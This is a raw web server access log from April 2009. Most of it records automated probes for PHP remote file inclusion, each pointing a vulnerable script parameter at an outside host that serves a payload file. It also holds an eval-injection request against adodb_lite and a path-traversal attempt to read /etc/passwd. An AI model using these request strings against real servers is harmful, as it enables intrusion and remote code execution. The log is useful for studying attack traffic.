163.24.136.10 - - [15/Apr/2009:05:49:52 -0500] "GET /logs/access_log.1235520000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
59.148.232.5 - - [15/Apr/2009:05:50:19 -0500] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
59.148.232.5 - - [15/Apr/2009:05:50:19 -0500] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
59.148.232.5 - - [15/Apr/2009:05:50:20 -0500] "GET /logs/access_log.1230249600/inc/cmses/aedatingCMS.php?dir[inc]=http://208.98.22.241/v9scan/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.236.94.133 - - [15/Apr/2009:05:50:21 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://solelyyoursgem.com/img/products/jan/bot/coracore/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
203.236.94.133 - - [15/Apr/2009:05:50:22 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://solelyyoursgem.com/img/products/jan/bot/coracore/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
168.143.19.89 - - [15/Apr/2009:05:51:24 -0500] "GET /logs//?sIncPath=http://www.discountbodybuildingsupplementsstore.com/id.txt.1?? HTTP/1.1" 200 185632 "-""libwww-perl/5.825"
168.143.19.89 - - [15/Apr/2009:05:51:24 -0500] "GET //?sIncPath=http://www.discountbodybuildingsupplementsstore.com/id.txt.1?? HTTP/1.1" 200 3245 "-""libwww-perl/5.825"
168.143.19.89 - - [15/Apr/2009:05:51:25 -0500] "GET /logs//?sIncPath=http://www.discountbodybuildingsupplementsstore.com/id.txt.1?? HTTP/1.1" 200 185632 "-""libwww-perl/5.825"
168.143.19.89 - - [15/Apr/2009:05:51:25 -0500] "GET //?sIncPath=http://www.discountbodybuildingsupplementsstore.com/id.txt.1?? HTTP/1.1" 200 3245 "-""libwww-perl/5.825"
168.143.19.89 - - [15/Apr/2009:05:51:44 -0500] "GET /logs//?sIncPath=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 200 185632 "-""libwww-perl/5.825"
168.143.19.89 - - [15/Apr/2009:05:51:44 -0500] "GET //?sIncPath=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.825"
216.104.37.122 - - [15/Apr/2009:05:52:44 -0500] "GET /logs//?sIncPath=http://rubii.t35.com/pit-id.txt? HTTP/1.1" 200 185632 "-""libwww-perl/5.825"
216.104.37.122 - - [15/Apr/2009:05:52:44 -0500] "GET //?sIncPath=http://rubii.t35.com/pit-id.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.825"
88.84.157.44 - - [15/Apr/2009:05:54:23 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.84.157.44 - - [15/Apr/2009:05:54:23 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
88.84.157.44 - - [15/Apr/2009:05:54:24 -0500] "GET /logs/access_log.1236211200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.119.154.129 - - [15/Apr/2009:05:55:00 -0500] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
85.119.154.129 - - [15/Apr/2009:05:55:00 -0500] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
85.119.154.129 - - [15/Apr/2009:05:55:00 -0500] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
85.119.154.129 - - [15/Apr/2009:05:55:00 -0500] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
85.119.154.129 - - [15/Apr/2009:05:55:00 -0500] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
85.119.154.129 - - [15/Apr/2009:05:55:00 -0500] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
85.119.154.129 - - [15/Apr/2009:05:55:05 -0500] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
85.119.154.129 - - [15/Apr/2009:05:55:05 -0500] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
168.143.19.89 - - [15/Apr/2009:05:55:33 -0500] "GET /logs//?sIncPath=http://www.discountbodybuildingsupplementsstore.com/id.txt.1?? HTTP/1.1" 200 185632 "-""libwww-perl/5.825"
168.143.19.89 - - [15/Apr/2009:05:55:33 -0500] "GET /logs//?sIncPath=http://www.discountbodybuildingsupplementsstore.com/id.txt.1?? HTTP/1.1" 200 185632 "-""libwww-perl/5.825"
168.143.19.89 - - [15/Apr/2009:05:55:33 -0500] "GET //?sIncPath=http://www.discountbodybuildingsupplementsstore.com/id.txt.1?? HTTP/1.1" 200 3245 "-""libwww-perl/5.825"
168.143.19.89 - - [15/Apr/2009:05:55:33 -0500] "GET //?sIncPath=http://www.discountbodybuildingsupplementsstore.com/id.txt.1?? HTTP/1.1" 200 3245 "-""libwww-perl/5.825"
168.143.19.89 - - [15/Apr/2009:05:55:34 -0500] "GET /logs//?sIncPath=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 200 185632 "-""libwww-perl/5.825"
168.143.19.89 - - [15/Apr/2009:05:55:34 -0500] "GET //?sIncPath=http://envolverde.ig.com.br/parceiros/id.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.825"
216.104.37.122 - - [15/Apr/2009:05:56:04 -0500] "GET /logs//?sIncPath=http://rubii.t35.com/pit-id.txt? HTTP/1.1" 200 185632 "-""libwww-perl/5.825"
216.104.37.122 - - [15/Apr/2009:05:56:04 -0500] "GET //?sIncPath=http://rubii.t35.com/pit-id.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.825"
88.84.157.44 - - [15/Apr/2009:05:57:08 -0500] "GET /logs/access_log.1236211200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
88.84.157.44 - - [15/Apr/2009:05:57:08 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
88.84.157.44 - - [15/Apr/2009:05:57:09 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
205.168.82.154 - - [15/Apr/2009:05:58:27 -0500] "GET /logs/access_log.1232064000/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sior.org/zero/images/copyright.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
70.38.31.50 - - [15/Apr/2009:06:01:11 -0500] "GET /logs/_test_holidays.php?APB_rp=http://www.ptps.cyc.edu.tw/appserv/argest.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
70.38.31.50 - - [15/Apr/2009:06:01:11 -0500] "GET /logs/_test_holidays.php?APB_rp=http://www.ptps.cyc.edu.tw/appserv/argest.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
70.38.31.50 - - [15/Apr/2009:06:01:11 -0500] "GET /_test_holidays.php?APB_rp=http://www.ptps.cyc.edu.tw/appserv/argest.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
70.38.31.50 - - [15/Apr/2009:06:01:11 -0500] "GET /_test_holidays.php?APB_rp=http://www.ptps.cyc.edu.tw/appserv/argest.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
65.55.208.133 - - [15/Apr/2009:06:02:53 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [15/Apr/2009:06:02:54 -0500] "GET /logs/access_log.1164672000 HTTP/1.1" 200 812 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
70.38.31.50 - - [15/Apr/2009:06:07:16 -0500] "GET /logs//add.php?APB_rp=http://www.ptps.cyc.edu.tw/appserv/argest.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
70.38.31.50 - - [15/Apr/2009:06:07:16 -0500] "GET //add.php?APB_rp=http://www.ptps.cyc.edu.tw/appserv/argest.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
70.38.31.50 - - [15/Apr/2009:06:07:16 -0500] "GET /logs//add.php?APB_rp=http://www.ptps.cyc.edu.tw/appserv/argest.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
70.38.31.50 - - [15/Apr/2009:06:07:16 -0500] "GET //add.php?APB_rp=http://www.ptps.cyc.edu.tw/appserv/argest.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
88.84.157.44 - - [15/Apr/2009:06:07:25 -0500] "GET /logs/access_log.1237420800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
88.84.157.44 - - [15/Apr/2009:06:07:54 -0500] "GET /logs/access_log.1238198400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
88.84.157.44 - - [15/Apr/2009:06:08:02 -0500] "GET /logs/access_log.1237680000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
88.84.157.44 - - [15/Apr/2009:06:09:01 -0500] "GET /logs/access_log.1238198400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
89.108.67.51 - - [15/Apr/2009:06:10:06 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.knoum.or.kr/bbs/data/album/1051618750/pulaid.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.812"
89.108.67.51 - - [15/Apr/2009:06:10:06 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.knoum.or.kr/bbs/data/album/1051618750/pulaid.txt???? HTTP/1.1" 404 319 "-""libwww-perl/5.812"
65.55.208.140 - - [15/Apr/2009:06:13:10 -0500] "GET /logs/access_log.1116374400 HTTP/1.1" 200 332 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.140 - - [15/Apr/2009:06:15:09 -0500] "GET /logs/access_log.1192665600 HTTP/1.1" 200 3302 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
77.79.245.90 - - [15/Apr/2009:06:15:17 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.808"
77.79.245.90 - - [15/Apr/2009:06:15:17 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
66.249.71.203 - - [15/Apr/2009:06:19:28 -0500] "GET /logs/access_log.1236816000 HTTP/1.1" 200 203942 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.116.84.254 - - [15/Apr/2009:06:27:47 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
217.116.84.254 - - [15/Apr/2009:06:27:47 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
217.116.84.254 - - [15/Apr/2009:06:27:47 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
217.116.84.254 - - [15/Apr/2009:06:27:52 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.212.165.162 - - [15/Apr/2009:06:30:52 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.212.165.162 - - [15/Apr/2009:06:30:52 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
67.212.165.162 - - [15/Apr/2009:06:30:52 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
67.212.165.162 - - [15/Apr/2009:06:30:56 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
65.55.208.139 - - [15/Apr/2009:06:33:09 -0500] "GET /logs/?S=D HTTP/1.1" 200 185627 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.106.135.14 - - [15/Apr/2009:06:57:07 -0500] "GET /logs/access_log.1232582400//tools/send_reminders.php?noSet=0&includedir=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
87.106.135.14 - - [15/Apr/2009:06:57:07 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
87.106.135.14 - - [15/Apr/2009:06:57:08 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.101.159.28 - - [15/Apr/2009:06:58:05 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.er.uqam.ca/nobel/social/2007/components/ID.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
121.101.159.28 - - [15/Apr/2009:06:58:05 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.er.uqam.ca/nobel/social/2007/components/ID.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
205.168.82.154 - - [15/Apr/2009:07:02:04 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sior.org/zero/images/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
205.168.82.154 - - [15/Apr/2009:07:02:04 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sior.org/zero/images/copyright.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
205.168.82.154 - - [15/Apr/2009:07:02:04 -0500] "GET /logs/access_log.1237766400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sior.org/zero/images/copyright.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
77.79.245.90 - - [15/Apr/2009:07:11:26 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.808"
77.79.245.90 - - [15/Apr/2009:07:11:27 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.casinopaper.org/www/casinoh/MADONGCMD.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
193.47.80.46 - - [15/Apr/2009:07:15:36 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.46 - - [15/Apr/2009:07:15:36 -0500] "GET / HTTP/1.1" 200 3245 "-""Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
91.184.53.81 - - [15/Apr/2009:07:29:38 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.albertajobshark.com/id.txt???? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
91.184.53.81 - - [15/Apr/2009:07:29:38 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.albertajobshark.com/id.txt???? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
210.118.194.225 - - [15/Apr/2009:07:29:49 -0500] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
210.118.194.225 - - [15/Apr/2009:07:29:50 -0500] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
74.94.66.42 - - [15/Apr/2009:07:30:04 -0500] "GET /logs/index.php?corpo=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
74.94.66.42 - - [15/Apr/2009:07:30:04 -0500] "GET /index.php?corpo=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.805"
210.118.194.225 - - [15/Apr/2009:07:31:01 -0500] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
217.199.222.19 - - [15/Apr/2009:07:31:01 -0500] "GET /logs//admin/ST_platforms.php?include_path=http://community.creativity.edu.tw/uploads/idomila.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
217.199.222.19 - - [15/Apr/2009:07:31:02 -0500] "GET //admin/ST_platforms.php?include_path=http://community.creativity.edu.tw/uploads/idomila.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
210.118.194.225 - - [15/Apr/2009:07:31:04 -0500] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
217.199.222.19 - - [15/Apr/2009:07:31:23 -0500] "GET /logs//admin/ST_platforms.php?include_path=http://community.creativity.edu.tw/uploads/idomila.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
217.199.222.19 - - [15/Apr/2009:07:31:23 -0500] "GET //admin/ST_platforms.php?include_path=http://community.creativity.edu.tw/uploads/idomila.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
210.118.194.225 - - [15/Apr/2009:07:32:33 -0500] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
210.118.194.225 - - [15/Apr/2009:07:32:33 -0500] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
195.16.51.207 - - [15/Apr/2009:07:36:12 -0500] "GET /logs//admin/ST_platforms.php?include_path=http://community.creativity.edu.tw/uploads/idomila.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
195.16.51.207 - - [15/Apr/2009:07:36:12 -0500] "GET //admin/ST_platforms.php?include_path=http://community.creativity.edu.tw/uploads/idomila.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
218.185.20.88 - - [15/Apr/2009:07:37:04 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
218.185.20.88 - - [15/Apr/2009:07:37:04 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
87.106.135.14 - - [15/Apr/2009:07:37:27 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
87.106.135.14 - - [15/Apr/2009:07:37:27 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
87.106.135.14 - - [15/Apr/2009:07:37:28 -0500] "GET /logs/access_log.1232582400//tools/send_reminders.php?noSet=0&includedir=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.16.51.207 - - [15/Apr/2009:07:37:46 -0500] "GET /logs//admin/ST_platforms.php?include_path=http://community.creativity.edu.tw/uploads/idomila.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
195.16.51.207 - - [15/Apr/2009:07:37:47 -0500] "GET //admin/ST_platforms.php?include_path=http://community.creativity.edu.tw/uploads/idomila.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
216.117.155.16 - - [15/Apr/2009:07:47:01 -0500] "GET //agenda.php3?rootagenda=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
216.117.155.16 - - [15/Apr/2009:07:47:01 -0500] "GET /logs//agenda.php3?rootagenda=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.117.155.16 - - [15/Apr/2009:07:47:01 -0500] "GET /logs/access_log.1235606400//agenda.php3?rootagenda=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.117.155.16 - - [15/Apr/2009:07:47:09 -0500] "GET //agenda.php3?rootagenda=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
216.117.155.16 - - [15/Apr/2009:07:47:09 -0500] "GET /logs//agenda.php3?rootagenda=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.117.155.16 - - [15/Apr/2009:07:47:09 -0500] "GET /logs/access_log.1235606400//agenda.php3?rootagenda=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
79.189.194.35 - - [15/Apr/2009:07:53:45 -0500] "GET /logs/canal.php?meio=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
79.189.194.35 - - [15/Apr/2009:07:53:45 -0500] "GET /canal.php?meio=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
211.189.26.122 - - [15/Apr/2009:07:54:34 -0500] "GET /logs//agenda.php3?rootagenda=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.189.26.122 - - [15/Apr/2009:07:54:34 -0500] "GET //agenda.php3?rootagenda=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
211.189.26.122 - - [15/Apr/2009:07:54:34 -0500] "GET /logs/access_log.1235606400//agenda.php3?rootagenda=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.189.26.122 - - [15/Apr/2009:07:55:22 -0500] "GET //agenda.php3?rootagenda=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
211.189.26.122 - - [15/Apr/2009:07:55:22 -0500] "GET /logs//agenda.php3?rootagenda=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.189.26.122 - - [15/Apr/2009:07:55:22 -0500] "GET /logs/access_log.1235606400//agenda.php3?rootagenda=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
65.55.230.165 - - [15/Apr/2009:07:57:15 -0500] "GET /logs/access_log.1234742400 HTTP/1.1" 200 167874 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
218.185.20.88 - - [15/Apr/2009:07:58:26 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
218.185.20.88 - - [15/Apr/2009:07:58:26 -0500] "GET //components/com_flyspray/startdown.php?file=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
221.134.144.147 - - [15/Apr/2009:07:59:15 -0500] "GET /canal.php?meio=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
221.134.144.147 - - [15/Apr/2009:07:59:15 -0500] "GET /logs/canal.php?meio=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
124.0.54.98 - - [15/Apr/2009:08:01:45 -0500] "GET /logs//agenda.php3?rootagenda=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
124.0.54.98 - - [15/Apr/2009:08:01:45 -0500] "GET //agenda.php3?rootagenda=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
124.0.54.98 - - [15/Apr/2009:08:01:45 -0500] "GET /logs/access_log.1235606400//agenda.php3?rootagenda=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
124.0.54.98 - - [15/Apr/2009:08:02:18 -0500] "GET /logs//agenda.php3?rootagenda=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
124.0.54.98 - - [15/Apr/2009:08:02:18 -0500] "GET //agenda.php3?rootagenda=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
124.0.54.98 - - [15/Apr/2009:08:02:19 -0500] "GET /logs/access_log.1235606400//agenda.php3?rootagenda=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.249.71.203 - - [15/Apr/2009:08:02:44 -0500] "GET /icons/back.gif HTTP/1.1" 200 216 "-""Googlebot-Image/1.0"
124.0.54.98 - - [15/Apr/2009:08:03:18 -0500] "GET /logs/access_log.1235606400//agenda.php3?rootagenda=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
124.0.54.98 - - [15/Apr/2009:08:03:18 -0500] "GET //agenda.php3?rootagenda=http://www.universalenglish.com/bbs//skin/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
